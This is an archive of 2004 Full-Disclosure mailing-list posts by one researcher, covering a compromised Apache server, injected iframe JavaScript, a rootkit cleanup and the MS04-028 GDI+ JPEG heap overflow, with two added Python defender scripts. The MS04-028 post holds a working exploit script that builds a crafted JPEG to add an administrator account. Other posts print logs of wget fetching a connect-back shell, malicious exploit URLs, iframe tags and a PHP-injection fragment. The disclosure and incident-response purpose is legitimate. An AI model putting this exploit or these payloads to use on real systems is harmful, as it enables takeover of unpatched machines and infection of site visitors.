Re: [Full-Disclosure] Online Script Decoder

2004-12-07 Thread Elia Florio
>http://www.greymagic.com/security/tools/decoder/
Is anyone able to decode this encoded malware/exploit script:

http://www.antiblock.biz/user256/2DimensionOfExploitsEnc.php

Is it a different layer of encoding/encryption... or is it
only a badly encoded script?

EF


Message sent by
Edizioni Master Webmail
http://mbox.edmaster.it

___
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html


Re: [Full-Disclosure] Is www.sco.com hacked?

2004-11-29 Thread Elia Florio
There are these two JPG files on www.sco.com :

(the good one)
http://www.sco.com/images/landing_pages_new/webinar_land2.jpg

(the supposed hacked one)
http://www.sco.com/images/landing_pages_new/webinar_land2-1.jpg

These are the JFIF headers of the images:

(the good one)
0100  FF D8 FF E0 00 10 4A 46-49 46 00 01 02 01 00 48   ..JFIF.H
0110  00 48 00 00 FF E1 0C 22-45 78 69 66 00 00 4D 4D   .H."Exif..MM
0120  00 2A 00 00 00 08 00 07-01 12 00 03 00 00 00 01   .*..
0130  00 01 00 00 01 1A 00 05-00 00 00 01 00 00 00 62   ...b
0140  01 1B 00 05 00 00 00 01-00 00 00 6A 01 28 00 03   ...j.(..
0150  00 00 00 01 00 02 00 00-01 31 00 02 00 00 00 14   .1..

(the supposed hacked one)
0100  FF D8 FF E0 00 10 4A 46-49 46 00 01 02 00 00 64   ..JFIF.d
0110  00 64 00 00 FF EC 00 11-44 75 63 6B 79 00 01 00   .d..Ducky...
0120  04 00 00 00 3C 00 00 FF-EE 00 0E 41 64 6F 62 65   <..Adobe
0130  00 64 C0 00 00 00 01 FF-DB 00 84 00 06 04 04 04   .d..
0140  05 04 06 05 05 06 09 06-05 06 09 0B 08 06 06 08   
0150  0B 0C 0A 0A 0B 0A 0A 0C-10 0C 0C 0C 0C 0C 0C 10   

I remember the "Ducky Adobe" strings in the
crafted JPEGs of the GDI+ bugs. Maybe just a coincidence?

EF




Re: [Full-Disclosure] MSIE src&name property disclosure

2004-11-08 Thread Elia Florio
Common laws in IT-security:

I° Micro$oft bugs law :
"a bug is a bug only if found in competitor's software (or if it
could be used in any commercial report to show Windoze
better&stronger than other OSes)."

II° Micro$oft bugs law :
"Windoze has only bugs that M$ said it has; every other bug, found
by bad-and-evil-security-guys is not a bug."

III° Micro$oft bugs law :
"every bug discovered by others is only a windows update problem or
a missing feature of operating system which will be fixed in next
service pack"

IV° Micro$oft bugs law :
"if we find a bug by ourselves... we fix it in the dark
and then erase the programmers' memories so that they can
never remember it"

:)




Rv: [Full-Disclosure] MSIE and tag NAME property bufferoverflow PoC exploit (was: python does mangleme (with IE bugs!))

2004-11-02 Thread Elia Florio
Good job, the exploit works on both of my:

IE 6.0.2800.1106 ENGLISH with SHDOCVW.DLL version 6.0.2800.1400
IE 6.0.2800.1106 ITALIAN with SHDOCVW.DLL version 6.0.2800.1584

Both tested on Win XP Professional SP1 with the
latest October patches installed.

The overflow occurs at this point in SHDOCVW.DLL (with EAX = 0D0D0D0D)

7178E69E   8B40 34  MOV EAX,DWORD PTR DS:[EAX+34]
7178E6A1   85C0 TEST EAX,EAX
7178E6A3   74 21JE SHORT SHDOCVW.7178E6C6
7178E6A5   8B75 0C  MOV ESI,DWORD PTR SS:[EBP+C]
...
...

EF

PS: after testing the exploit, Windows increased the swap
file size, saying virtual memory is too low; is this a side effect of the
exploit?




Re: [Full-Disclosure] Hackers of [xpire.info] use an unknown Apache 1.3.27 exploit???

2004-10-29 Thread Elia Florio
> Hi,
> It appears that the signature is
>
>  C6C22C  mov dl, 2C
> 0003 37  aaa
> 0004 60  pushad
> 0005 C1EFD4  shr edi, D4
> 0008 C4922264C66Ales edx, dword ptr [edx+6AC66422]
> 000E E10Dloopz 001D
> 0010 8A6A5F  mov ch, byte ptr [edx+5F]
> 0013 D44Eaam (base78)
> 0015 91  xchg eax,ecx
> 0016 10044D  adc byte ptr [2*ecx+104D044D], al
>
> The beginning & the end of the disassembly may be wrong if the signature
> is not complete. However it doesn't make much sense globally and this
> code is too short to see a potential attack : no memory is written here.
> By the way, where is this signature from ?

Someone (Peter Kosinar) suggested to me that this byte pattern
is a potential command directed to the "suckit" rootkit over port 80;
the first bytes are a kind of authentication hash and the final bytes
are changing because it's a port number... Still investigating this...

Your work is great, but maybe this isn't an attack
pattern, so the bytes are not asm instructions! Thank you anyway...

The signature comes from different compromised
Apache 1.3.27 (with PHP 4.2.3) error logs.

I've contacted the sysadmins of the IPs originating these attacks,
because someone else suggested to me that the attacking hosts too
are compromised boxes used by this hacker crew.
They own a lot of Apache *nix servers worldwide :((

216.40.203.9 : ns1.tnet.ch : An old Cobalt RaQ server, with very poor
security.
OrgName: Everyones Internet, Inc.
Country: US
-
140.105.55.159 : dschrahm3.univ.trieste.it .
netname: TRIESTE-NET
descr: Universita' degli Studi di Trieste
-
195.140.140.122 : from France :
netname: CTN-1
-
212.78.145.16 : Another old Cobalt server from Spain :
Hostname : 16.red-212-78-145.user.auna.net
netname: MENTA-ECOM
descr: Cable i Televisio de Catalunya
descr: Internet de Banda Ampla
-
65.125.235.250 :
EZZI.NET Q0625-65-125-224-0 (NET-65-125-224-0-1)
65.125.224.0 - 65.125.239.255

EF




[Full-Disclosure] Hackers of [xpire.info] use an unknown Apache 1.3.27 exploit???

2004-10-28 Thread Elia Florio
Hi list,
I'm fighting again against a hacker crew
(I suppose the same mentioned in this link:
http://seclists.org/lists/incidents/2004/Jul/0056.html  )
which is installing various malware on many
compromised boxes to get a group of zombies ready to run.
(follow my previous mail on "xpire.info" and "splitinfinity.info")

I've found in some logs that they use different exploits on port 80
but one exploit is specific to Apache 1.3.27 (with PHP/Perl
and other modules installed).

It looks like an overflow, I know that 1.3.27 is a bugged version,
but I would like to know if anyone has seen this code before.
Extracted from the error log of Apache:

216.40.203.9 - - [28/Oct/2004:10:54:37 +0200]
"xc6xc2,7`xc1xefxd4$xc4x92"dxc6jxe1rx8aj_xd8(xcbtxa6xba"
400 299

140.105.55.159 - - [08/Oct/2004:15:55:35 +0200]
"xc6xc2,7`xc1xefxd4$xc4x92"dxc6jxe1rx8aj_x8ci7x9fx8cxec" 400
-

195.140.140.122 - - [11/Oct/2004:03:58:05 +0200]
"xc6xc2,7`xc1xefxd4$xc4x92"dxc6jxe1rx8aj_xc3x8cx8czxcfx19"
400 -

212.78.145.16 - - [13/Oct/2004:20:48:23 +0200]
"xc6xc2,7`xc1xefxd4$xc4x92"dxc6jxe1rx8aj_xd4Nx91x10x04M" 400
-

65.125.235.250 - - [28/Oct/2004:09:55:02 +0200]
"xc6xc2,7`xc1xefxd4$xc4x92"dxc6jxe1rx8aj_A}xebxfax8axe5"
400 - "-" "-"

65.125.235.250 - - [28/Oct/2004:09:55:58 +0200]
"xc6xc2,7`xc1xefxd4$xc4x92"dxc6jxe1rx8aj_A}xebxfax8axe8"
400 - "-" "-"

I would suggest to any sysadmin using Apache 1.3.27 to ban these subnets
from their hosts, because all the attacks are coming from these machines:

216.40.203.*,
140.105.55.*,
195.140.140.*,
212.78.145.*,
65.125.235.*
(...and obvious "xpire.info")

Someone suggested to me that they are related to:

Qwest Communications NET-QWEST-BLKS-4 (NET-65-112-0-0-1)
65.112.0.0 - 65.127.255.255
EZZI.NET Q0625-65-125-224-0 (NET-65-125-224-0-1)
65.125.224.0 - 65.125.239.255

The exploits left these signatures (I have to translate the opcodes into asm):

xC6 xC2 x2C x37 x60 xC1 xEF xD4 xC4 x92 x22 x64 xC6 x6A xE1 x0D x8A
x6A x5F xD4 x4E x91 x10 x04 4D

The last bytes are changing in every attempt, so this seems to be a
brute-force attempt to get a valid return address to execute the exploit.

Probably the exploit works for a specific version of Apache/Linux kernel,
so the hacker has to try many times with different ret. addresses to
find the right way to execute it.

Any comments?

EF


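A defender-side check for the request signature discussed in this post and in the follow-up reply above (where it is suggested the bytes are a command for the "suckit" rootkit rather than shellcode). This is an added example, not code from the original messages: it decodes Apache's \xHH, \r and \" escaping of a logged request line back to raw bytes, matches the 20-byte prefix that all six quoted entries share (the bytes up to and including the "_"), and reports the varying trailing bytes per source IP, which is what the poster observed changing between attempts. The log lines inside the block are constructed in Apache's escaped form to mirror the quoted entries (the copies in the post appear with their backslashes stripped); the field layout assumed is the standard access-log request line as quoted in the post.

```python
import re
from collections import defaultdict

# Constructed sample lines in the escaped form Apache writes for a malformed
# request line: non-printable bytes as \xHH, carriage return as \r, an
# embedded quote as \". The first two mirror entries quoted in the post; the
# third is an ordinary request that must not match.
SAMPLE_LOG = [
    r'216.40.203.9 - - [28/Oct/2004:10:54:37 +0200] "\xc6\xc2,7`\xc1\xef\xd4$\xc4\x92\"d\xc6j\xe1\r\x8aj_\xd8(\xcbt\xa6\xba" 400 299',
    r'140.105.55.159 - - [08/Oct/2004:15:55:35 +0200] "\xc6\xc2,7`\xc1\xef\xd4$\xc4\x92\"d\xc6j\xe1\r\x8aj_\x8ci7\x9f\x8c\xec" 400 -',
    r'10.0.0.5 - - [28/Oct/2004:11:00:00 +0200] "GET /index.html HTTP/1.0" 200 1234',
]

# The 20 bytes common to every entry quoted in the post; only the bytes
# after this prefix change between attempts.
SIGNATURE = bytes.fromhex("c6c22c3760c1efd424c4922264c66ae10d8a6a5f")

_LINE = re.compile(r'^(\S+) \S+ \S+ \[([^\]]+)\] "(.*)" (\d{3}) (\S+)')
_ESC = re.compile(r'\\(x[0-9a-fA-F]{2}|[rnt"\\])')
_SIMPLE = {"r": 0x0D, "n": 0x0A, "t": 0x09, '"': 0x22, "\\": 0x5C}


def unescape_apache(field):
    """Turn Apache's escaped request-line text back into the raw bytes sent."""
    out = bytearray()
    pos = 0
    for m in _ESC.finditer(field):
        out += field[pos:m.start()].encode("latin-1")
        tok = m.group(1)
        out.append(int(tok[1:], 16) if tok[0] == "x" else _SIMPLE[tok])
        pos = m.end()
    out += field[pos:].encode("latin-1")
    return bytes(out)


def scan_log(lines, signature=SIGNATURE):
    """Return one hit per line whose decoded request starts with `signature`.

    Each hit records the source IP, the timestamp, the HTTP status and the
    trailing bytes (hex) that follow the fixed prefix, which is the part
    that varied between the attempts in the post.
    """
    hits = []
    for line in lines:
        m = _LINE.match(line)
        if not m:
            continue
        ip, stamp, request, status, _size = m.groups()
        raw = unescape_apache(request)
        if raw.startswith(signature):
            hits.append({"ip": ip, "time": stamp, "status": int(status),
                         "tail": raw[len(signature):].hex()})
    return hits


def tails_by_source(hits):
    """Group the varying tails per source IP to see how many attempts each host made."""
    grouped = defaultdict(list)
    for h in hits:
        grouped[h["ip"]].append(h["tail"])
    return dict(grouped)


if __name__ == "__main__":
    found = scan_log(SAMPLE_LOG)
    for h in found:
        print(f'{h["ip"]} {h["time"]} status={h["status"]} tail={h["tail"]}')
    print(tails_by_source(found))
```

Run it against a real error_log by reading the file into `scan_log`; anything that matches is worth correlating with the other hosts the post lists, and the grouped tails show whether one source is cycling through values.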


Re: [Full-Disclosure] xpire.info & splitinfinity.info - exploits in the wild

2004-10-27 Thread Elia Florio
>> (for example Symantec and ClamAV don't recognize many malware
>> in this site, after a quick test made with www.virustotal.com)
>
> If you have some time, could you assist the clamav team and send them a
> detailed report with your findings and the undetected code bits?
>
> They will appreciate your cooperation in this.
>
> Hugo.

Of course, I'd like to support the Clam team... they're working
hard for a valuable open-source AV and I appreciate this too!
I can send them my reports (extracted from virustotal.com) and
the undetected files (exe, dll, class, javascript, html) with
malware/trojans and exploits taken from "xpire.info".

Where do I send this archive? What's the mail address?
Must I use a PGP key or simply a password-protected zip?

EF




Re: [Full-Disclosure] xpire.info & splitinfinity.info - exploits in the wild

2004-10-26 Thread Elia Florio
Finally, I cleaned the compromised box of my friend :))
I've found (following many helpful suggestions of people on the FD list)
that a variant of the "suckit" rootkit was installed on this machine.
The strange thing is that "rkhunter" and "chkrootkit" don't catch it
in any way, and they said that everything is ok.

To find suckit and deactivate it I used this:
http://tsd.student.utwente.nl/skdetect/
It's code based on the suckit source code, but without the malware part.
It can dig into /dev/kmem and explore sys_call_table[];
skdetect was able to find suckit installed.
Another person who was compromised by the "xpire.info" hacker told me
that the symptoms were the same and that on his host too he found this suckit variant installed.

>suckit version 'Q' DETECTED
>kernel-part uninstall seems successful.

After reboot everything come back to normal activity.
Thank you to everyone for the answers given to me
(Ron DuFresne, Nick FitzGerald, Kevin and others).

Actually on the "xpire.info/fa/?d=get" malware page you can find these exploits in the wild:

<IFRAME SRC="http://www.sp2fucked.biz/user28/counter.htm" WIDTH=0 BORDER=0 HEIGHT=0>
<iframe src="http://xpire.info/fa/t3.htm" width=1 height=1>
<iframe src="http://xpire.info/fa/x.htm" width=1 height=1>
<iframe src="http://xpire.info/fa/proc.htm" width=1 height=1>
<iframe src="http://xpire.info/fa/runevil.htm" width=1 height=1>
<iframe src="http://213.159.117.133/dl/adv121.php" width=1 height=1>
<IFRAME SRC="http://x.full-tgp.net/?fox.com" WIDTH=1 HEIGHT=1>

There are a lot of backdoors/trojans ready to install and the bad news is that
most of this malware is recompiled, so many AVs are fooled and don't catch them
(for example Symantec and ClamAV don't recognize much of the malware
on this site, after a quick test made with www.virustotal.com)

Bye,
EF



Re: [Full-Disclosure] xpire.info & splitinfinity.info - exploits in the wild

2004-10-24 Thread Elia Florio
> I'm not sure that qmail-inject isn't a red herring?  The actual
> download looks like 'wget' was used.
Good suggestion, my friend :)

WGET was used to retrieve the http://xpire.info/cli.gz connectback shell.
After further analysis I've found that another person had the same problem:

http://groups.google.it/groups?hl=it&lr=&selm=2wrKc-2TW-49%40gated-at.bofh.it

Here is the log trapped by Apache:

[Mon Aug 23 06:25:18 2004] [notice] Accept mutex: sysvsem (Default:
sysvsem)
ls: /usr/bin/X11/X: No such file or directory
sh: option `-c' requires an argument
ls: /usr/bin/X11/X: No such file or directory
sh: option `-c' requires an argument
ls: /usr/bin/X11/X: No such file or directory
ls: /usr/include/sdk386: No such file or directory
ls: /usr/bin/X11/X: No such file or directory
ls: /usr/include/sdk386: No such file or directory
ls: /usr/bin/X11/X: No such file or directory
--18:06:28--  http://xpire.info/cli.gz
=> `/tmp/a.out'
Resolving xpire.info... done.
Connecting to xpire.info[202.99.23.162]:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 19,147 [text/plain]

0K ..    100%   20.04 KB/s

18:06:29 (20.04 KB/s) - `/tmp/a.out' saved [19147/19147]


If you compare the output, you can see that in the log I showed first the stdout
was in Italian (because the compromised server is .it), while in this case it is in English.
The hacker launched the WGET command to retrieve his hacking tool into /tmp/a.out.
In this log you can also see that the hacker tried to execute some "ls" commands,
as a first trial to test the vulnerability, I suppose.
Moved by this, after further analysis I found that the vulnerability used is an
obvious-but-effective PHP injection using global variables
(http://www.securityfocus.com/archive/1/218000 is a good page to learn
something about this vuln).

The hacker pages used to accomplish the injection are based on this
test page, taken directly from the hacker site :-)

http://xpire.info/s/2
http://xpire.info/s/

I notice that this site is full of trojans/backdoors/shells/worms/exploits and
other malware... why is it still open?

http://xpire.info/cli.gz        // connect back shell
http://xpire.info/fa/aga.exe    // agobot family
http://xpire.info/install.gz    // some trojan/malware... my NortonAV does not catch it; it's a Windows EXE

This is the sample of the PHP-injection page:
".$OS."";
echo "".$X."";
?>

Using the PHP "system" call, it is possible to execute any remote command, like
WGET for example.
Does anyone know this page already???


> I assume you used a bootable CD on the infected machine to do the
> checksums?
Unfortunately (I know that this is a *must* for a good analysis) I'm doing
the check remotely, using SSH, so I cannot use a bootable CD to connect to this
remote host, very far from me :)
I'm limited in the analysis... but the host is not mine!
However I think that md5sum gave me good results, because I compared the whole
/usr/sbin directory and all the checksums were good, except for
/usr/sbin/crond... any ideas???
I also used the "rpm -Vf" utility to cross-check the results, and they were the
same as md5sum.

> Check the httpd.conf (and other apache configuration files) for any
> changes, and also the contents of each module loaded.  It's also
> possible, but less likely, that the injection is done in a kernel
> module.
It's my fear :(( I studied all the *.conf files related to the Apache/PHP
modules of this machine, but nothing was found. An injected LKM could be the
only answer.

I also ran "chkrootkit" as someone suggested to me, but all the tests gave a
positive answer
(no worm, no rootkit, no trojan)

> Sounds like a good time to replace the entire server with a fresh build.
Actually my work will finish when this activity begins :))

Thank you for the help, Kevin.

EF



[Full-Disclosure] xpire.info & splitinfinity.info - exploits in the wild

2004-10-24 Thread Elia Florio
Hi list,
I'm doing some analysis on a Linux-Mandrake 9.0 web server
of a person that was compromised in October.
On this host a special trojan is now installed that inserts a
malicious tag into every served .PHP page.

The host is running these services:

Port 21: 220 ProFTPD 1.2.5 Server (XXX FTP Server) [server]
Port 22: SSH-1.99-OpenSSH_3.4p1
Port 25: 220 X ESMTP 5.5.1
Port 110: +OK <[EMAIL PROTECTED]>
Port 3306: MySQL 3.23.52
Ports 80/443: Server: Apache-AdvancedExtranetServer/1.3.26 (Mandrake Linux/6mdk) sxnet/1.2.4 mod_ssl/2.8.10 OpenSSL/0.9.6g PHP/4.2.3

I've found inside the Apache log that the hacker broke into the machine
using an overflow and injecting an executable /tmp/a.out via "qmail-inject".
These are the suspicious log lines:

[Sun Oct  3 03:35:10 2004] [notice] child pid 16012 exit signal Segmentation fault (11)
[Sun Oct  3 04:08:34 2004] [notice] child pid 1272 exit signal Segmentation fault (11)
[Sun Oct  3 07:18:27 2004] [notice] child pid 4397 exit signal Segmentation fault (11)
[Mon Oct  4 02:27:55 2004] [notice] child pid 1203 exit signal Segmentation fault (11)
qmail-inject: fatal: unable to parse this line:From: I.T.I.S. S. CANNIZZARO" <[EMAIL PROTECTED]>
[Mon Oct  4 18:43:02 2004] [notice] child pid 4248 exit signal Segmentation fault (11)
[Mon Oct  4 22:58:50 2004] [notice] child pid 1190 exit signal Segmentation fault (11)
[Tue Oct  5 11:58:13 2004] [notice] child pid 15689 exit signal Segmentation fault (11)
qmail-inject: fatal: unable to parse this line:
To: Drugo:[EMAIL PROTECTED]
sh: -c: option requires an argument
--15:50:07--  http://xpire.info/cli.gz
   => `/tmp/a.out'
Resolving xpire.info... fatto.
Connecting to xpire.info[221.139.50.11]:80... connected.
HTTP richiesta inviata, aspetto la risposta... 200 OK
Lunghezza: 19,147 [text/plain]

0K ..    100% 9.97K

15:50:13 (9.97 KB/s) - `/tmp/a.out' salvato [19147/19147]

[Fri Oct  8 20:26:52 2004] [notice] child pid 9647 exit signal Segmentation fault (11)
[Sat Oct  9 01:09:51 2004] [notice] child pid 3840 exit signal Segmentation fault (11)


Trying a WGET of http://xpire.info/cli.gz , I get an ELF executable for Linux,
possibly containing a ConnectBack shell. Inside this ELF file you can grep
these strings:

Usage:  %s host port
 pqrstuvwxyzabcde 0123456789abcdef /dev/ptmx /dev/pty /dev/tty sh -i Can't
fork pty, bye!
 Fuck you so
 /bin/sh No connect
 Looking up %s... Failed!
 OK
 %u Connect Back

I don't know if the hacker installed a rootkit on this machine, but the md5sum
check of the ls, lsof, ps, netstat binaries against the ones from a clean
Mandrake distribution was good...

The main problem is finding how the Apache server (or PHP) was altered by the
hacker, because every user that connects to this host now could be infected by
several recent HTML/IE exploits.
Sniffing HTTP packets from this host, I've found that *SOMETIMES* (in a
random way??) the web server inserts a special javascript between the HTTP
header and the served page.
The script is:

eval(String.fromCharCode(100,111,99,117,109,101,110,116,46,119,114,105,116,101,40,34,60,105,102,114,97,109,101,32,115,114,99,61,39,104,116,116,112,58,47,47,119,119,119,46,115,112,108,105,116,105,110,102,105,110,105,116,121,46,105,110,102,111,47,102,97,47,63,100,61,103,101,116,39,32,104,101,105,103,104,116,61,49,32,119,105,100,116,104,61,49,62,60,47,105,102,114,97,109,101,62,34,41))


Decoding it, I see that it writes an <iframe> tag inside the page pointing
to this url:

http://www.splitinfinity.info/fa/?d=get

If you surf to this page (don't do this if you use IE or are not patched)
you could get infected by several exploits, because it opens a lot of <iframe>
tags pointing to different domains.

I would like to list these domains here, because they are sources
for exploit studying:

Domain: www.sp2fucked.biz
http://69.50.168.147/user28/counter.htm

Found MHTMLRedir.Exploit
http://213.159.117.133/dl/adv121.php

http://195.178.160.30/js.php?cust=28

http://195.178.160.30/ifr.php?cust=89

http://69.50.168.147/user28/exploit.htm

Found Java class exploit
http://69.50.168.147/user28/exploit2.htm

My questions are:

1) how can I remove this injected Javascript/IFRAME? I've checked
httpd.conf and a lot of PHP pages, but I didn't find anything. Is it possible
that the hacker installed some compromised Apache module... or so???

2) does anyone know these sites already (xpire.info or splitinfinity.info)?
Why are they still online and serving trojans/exploits to surfers' browsers?
xpire.info is related to "Mike Fox"... but it sounds like a fake John Doe
registration!

  Domain ID:  D5946452-LRMS
  Domain Name:  XPIRE.INFO
  Created On:  23-May-2004 19:41:15 UTC
  Last Updated On:  02-Aug-2004 08:07:20 UTC
  Expiration Date:  23-May-2005 19:41:15 UTC
  Sponsoring Registrar:  Direct Information Pvt Ltd. d/b/a Directi.com
(R159-LRMS)
  Status:  ACTIVE
  Status:  OK
  Registrant ID:  C4752858-LRMS
  Registrant Name:  Mike Fox
  Registrant Org
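The script the server injects (quoted in this post) is a String.fromCharCode array wrapped in eval. As an added example, not code from the original post, the following Python decodes such a payload back to the JavaScript it builds (for this script: a document.write of an iframe pointing at http://www.splitinfinity.info/fa/?d=get) and pulls out every iframe src, which is the part an analyst needs for blocking and correlation. The INJECTED string reproduces the script exactly as quoted, including the e-mail line wraps; the decoder strips whitespace inside the call before parsing, which rejoins the numbers the wrapping split, on the assumption that the wrapping only inserted newlines.

```python
import re

# The injected script as quoted in the post, including its e-mail line wraps
# (a constructed copy of the page's own text, not a live capture).
INJECTED = """\
eval(String.fromCharCode(100,111,99,117,109,101,110,116,46,119,114,105,116,1
01,40,34,60,105,102,114,97,109,101,32,115,114,99,61,39,104,116,116,112,58,47
,47,119,119,119,46,115,112,108,105,116,105,110,102,105,110,105,116,121,46,10
5,110,102,111,47,102,97,47,63,100,61,103,101,116,39,32,104,101,105,103,104,1
16,61,49,32,119,105,100,116,104,61,49,62,60,47,105,102,114,97,109,101,62,34,
41))
"""

_FROMCHARCODE = re.compile(r"String\.fromCharCode\(([\d,\s]*)\)")
_IFRAME_SRC = re.compile(r"<iframe[^>]*\ssrc=['\"]?([^'\"\s>]+)", re.IGNORECASE)


def decode_fromcharcode(script):
    """Return the string built by each String.fromCharCode(...) call in `script`.

    Whitespace inside the argument list is removed before splitting on commas,
    so a number that a mail client wrapped across two lines ("1" + newline +
    "01") is rejoined as 101; this assumes the wrap only inserted newlines.
    """
    decoded = []
    for m in _FROMCHARCODE.finditer(script):
        digits = re.sub(r"\s+", "", m.group(1))
        codes = [int(n) for n in digits.split(",") if n]
        decoded.append("".join(chr(c) for c in codes))
    return decoded


def extract_iframe_urls(html):
    """Return the src of every <iframe> in a decoded fragment."""
    return _IFRAME_SRC.findall(html)


def analyse(script):
    """Summarise an obfuscated snippet: decoded strings, iframe targets, eval use."""
    decoded = decode_fromcharcode(script)
    return {
        "uses_eval": "eval(" in script,
        "decoded": decoded,
        "iframe_urls": [u for d in decoded for u in extract_iframe_urls(d)],
    }


if __name__ == "__main__":
    report = analyse(INJECTED)
    for d in report["decoded"]:
        print(d)
    print(report["iframe_urls"])
```

The decoder never executes anything; it only reverses the character-code encoding, so it is safe to run on captured page content. Real payloads often nest several layers (fromCharCode inside unescape inside eval), so in practice the decoded output is fed back through the same function until nothing more decodes.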

[Full-Disclosure] MS04-028 Exploit PoC II - Shellcode=CreateUser X in Administrators Group

2004-09-22 Thread Elia Florio
Hi list,
this is my final work for the MS04-028 bug... it works,
after many suggestions and a deep look inside the heap overflow.
It uses shellcode (from metasploit) to add user "X" to the Admin
group and works on different versions of GDI+.
No script-kiddies, no lamers: modify the right "bytes" in the script before
using it.

Byez and always support [full-disclosure] !

[eflorio]


-

#!/bin/sh
#
# MS04-028 Exploit PoC II with Shellcode: CreateUser X in Administrators Group
#
# Tested on:
# WinXP Professional English SP1 - GDIPLUS.DLL version 5.1.3097.0
# WinXP Professional Italian SP1 - GDIPLUS.DLL version 5.1.3101.0
# (SP2 is not vulnerable, don't waste your time trying this exploit on it!)
#
# Usage:
#first,  replace the "\xCC" = INT3 instruction at beginning of shellcode
#second, choose a right ret address for GDI+ DLL and WinXP version
#then,  create crafted JPEG with: sh ms04-028.sh > img.jpg
#
# Created by:
#Elia Florio
#(heap overflow study purpose, not for lamerz, not for script-kiddie)
#
# Thanx to:
# jerome.athias
# metasploit.org
# idefense
# full-disclosure list

#
#Standard JPEG header
#
printf "\xFF\xD8\xFF\xE0\x00\x10\x4A\x46\x49\x46\x00\x01\x02\x00\x00\x64\x00\x60\x00\x00"
printf "\xFF\xEC\x00\x11\x44\x75\x63\x6B\x79\x00\x01\x00\x04\x00\x00\x00\x0A\x00\x00"
printf "\xFF\xEE\x00\x0E\x41\x64\x6F\x62\x65\x00\x64\xC0\x00\x00\x00\x01"

#
#Heap Overflow Trigger DWORD - 00 length field (01 works too)
#
printf "\xFF\xFE\x00\x01"


#
#Additional stuff to complete the header
#
printf  "\x00\x14\x10\x10\x19\x12\x19\x27\x17\x17\x27\x32"


#
#Sugg. by jerome.athias
# 1) Opening directly in IE
#Address to overwrite = RtlEnterCriticalSelection() - 4
#Check page 172 of SC Handbook for those of you playing along at home
#
printf "\xEB\x0F\x26\x32" #control ECX register


#
#Address of shellcode
#
printf "\x42\x42\x42\x42" #control EDX, leave these values if u wanna raise an exception and debug in GDI+
#printf "\xDC\xB1\xE7\x70" #70E7B1DC WinXP Professional English SP1 - GDIPLUS.DLL version 5.1.3097.0
#printf "\xDC\xB1\x30\x78" #7830B1DC WinXP Professional Italian SP1 - GDIPLUS.DLL version 5.1.3101.0


#
#end_of_jpeg_header
#
printf "\x26\x2E\x3E\x35\x35\x35\x35\x35\x3E"
#NOP1
printf "\xE8\x00\x00\x00\x00\x5B\x8D\x8B"
printf "\x00\x05\x00\x00\x83\xC3\x12\xC6\x03\x90\x43\x3B\xD9\x75\xF8"

#
#Image junk here...fake JPG
#
printf "\x00\x00\x00\xFF\xDB\x00\x43\x00\x08\x06\x06\x07\x06\x05\x08\x07\x07";
printf "\x07\x09\x09\x08\x0A\x0C\x14\x0D\x0C\x0B\x0B\x0C\x19\x12\x13\x0F\x14";
printf "\x1D\x1A\x1F\x1E\x1D\x1A\x1C\x1C\x20\x24\x2E\x27\x20\x22\x2C\x23\x1C";
printf "\x1C\x28\x37\x29\x2C\x30\x31\x34\x34\x34\x1F\x27\x39\x3D\x38\x32\x3C";
printf "\x2E\x33\x34\x32\xFF\xDB\x00\x43\x01\x09\x09\x09\x0C\x0B\x0C\x18\x0D";
printf "\x0D\x18\x32\x21\x1C\x21\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32";
printf "\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32";
printf "\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32";
printf "\x32\x32\x32\x32\x32\xFF\xC0\x00\x11\x08\x00\x03\x00\x03\x03\x01\x22";
printf "\x00\x02\x11\x01\x03\x11\x01\xFF\xC4\x00\x1F\x00\x00\x01\x05\x01\x01";
printf "\x01\x01\x01\x01\x00\x00\x00\x00\x00\x00\x00\x00\x01\x02\x03\x04\x05";
printf "\x06\x07\x08\x09\x0A\x0B\xFF\xC4\x00\xB5\x10\x00\x02\x01\x03\x03\x02";
printf "\x04\x03\x05\x05\x04\x04\x00\x00\x01\x7D\x01\x02\x03\x00\x04\x11\x05";
printf "\x12\x21\x31\x41\x06\x13\x51\x61\x07\x22\x71\x14\x32\x81\x91\xA1\x08";
printf "\x23\x42\xB1\xC1\x15\x52\xD1\xF0\x24\x33\x62\x72\x82\x09\x0A\x16\x17";
printf "\x18\x19\x1A\x25\x26\x27\x28\x29\x2A\x34\x35\x36\x37\x38\x39\x3A\x43";
printf "\x44\x45\x46\x47\x48\x49\x4A\x53\x54\x55\x56\x57\x58\x59\x5A\x63\x64";
printf "\x65\x66\x67\x68\x69\x6A\x73\x74\x75\x76\x77\x78\x79\x7A\x83\x84\x85";
printf "\x86\x87\x88\x89\x8A\x92\x93\x94\x95\x96\x97\x98\x99\x9A\xA2\xA3\xA4";
printf "\xA5\xA6\xA7\xA8\xA9\xAA\xB2\xB3\xB4\xB5\xB6\xB7\xB8\xB9\x

[Full-Disclosure] Control EDX/EAX in JPG Heap Overflow (MS04-028)

2004-09-21 Thread Elia Florio



Hi list,
I'm trying to study the heap overflow mentioned by MS04-028 in the GDIPLUS.DLL library.

After some tests, I've found that the position of the dword able to
control the EDX register (as Nick D. said) is the 5th DWORD,
counting after the malformed "FFFE" header.

A malformed JPEG header looks like this:
 
FF D8 FF E0 00 10 4A 46 49 46 00 01 00 00 00 01    ; ÿØÿà..JFIF..
00 01 00 00 FF FE 00 00 41 41 41 41 41 41 41 41    ; ÿþ..
41 41 41 41 41 41 41 41 43 43 43 43 41 41 41 41    ;
... jpeg format continues ...
 
It's possible to use "FFFE0001" or "FFFE" as an invalid comment length
to force the heap overflow. The overflow is raised when GDI+ calls
NTDLL.RtlFreeHeapW.
When we land in the exception area, OllyDbg shows this invalid instruction:

MOV DWORD PTR DS:[EDX], EAX

At this point we can control the value of EDX (it's overwritten by the
"CCCC" 0x43434343 dword inside the JPEG header), but it's difficult to
escape from the heap and take full control of execution.

I've found that the DWORD "28F0B600" used in the JPEG header in place of "CCCC"
(read in reversed form it is the 0xB6F028 address) can point [EDX] to the
stack area and can be used to write there the next return value popped by the
RETN 0C instruction. This helps to control the execution flow from this point;
however, when RETN 0C is executed, the IP will jump to the EAX value that was
stored in [EDX] before. Not good :(

Has anyone studied the overflow? Any suggestion???
 
[eflorio]


[Full-Disclosure] GDIPLUS VULN - MS04-028 - CRASH TEST JPEG

2004-09-15 Thread Elia Florio
Hi list, this is the JPEG able to reproduce the crash reported in
